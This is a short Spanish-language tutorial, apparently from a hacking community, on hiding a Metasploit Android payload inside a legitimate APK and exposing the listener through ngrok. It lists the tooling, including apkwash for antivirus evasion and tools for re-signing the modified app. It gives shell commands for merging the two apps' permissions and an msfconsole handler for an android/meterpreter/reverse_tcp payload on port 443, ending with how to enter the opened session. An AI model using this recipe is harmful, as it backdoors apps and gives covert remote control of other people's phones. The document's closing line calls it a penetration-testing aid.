(B0) APK Embebida + Ngrok PDF
(B0) APK Embebida + Ngrok PDF
(B0) APK Embebida + Ngrok PDF
Este documento es creado para la comunidad BlackOut y tiene todos los derechos
reservados, cualquier copia o distribucion fuera de dicha comunidad constara como
una violacion de las leyes eticas de los miembros y se pedira la expulsion inmediata
de la comunidad.
Las pruebas realizadas en este documento se basan en ParrotOS pero son validas para
Kali Linux. Las herramientas necesarias para llevar a cabo las pruebas mostradas son:
• Metasploit-Framework
• Apktool
• apkwash
• keytool
• jarsinger
• zipaling
• ngrok
Previamente deben haber creado una cuenta en ngrok y tomar el API Token para
utilizarlo en dicha utilidad.
Hecho esto iniciamos nuestro servicio de ngrok, en mi caso lo hare por el puerto 443.
Ahora creamos un archivo con los permisos de ambas aplicaciones, los extraemos del
AnroidManifest con el comando.
cat AndroidManifest.xml | grep 'uses-permission' | xclip -sel clip
Teniendo todos los permisos en un archivo nos debe quedar algo asi.
Ahora copiamos todos los permisos sin que se repitan:
cat permisos.txt | sort -u | xclip -sel clip
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
exploit -j
Cuando tengamos una sesion abierta simplemente accedemos a ella con:
session -i seguido del numero de la sesion.
Eso es todo, espero que les sirva este documento para hacer pruebas de penetracion.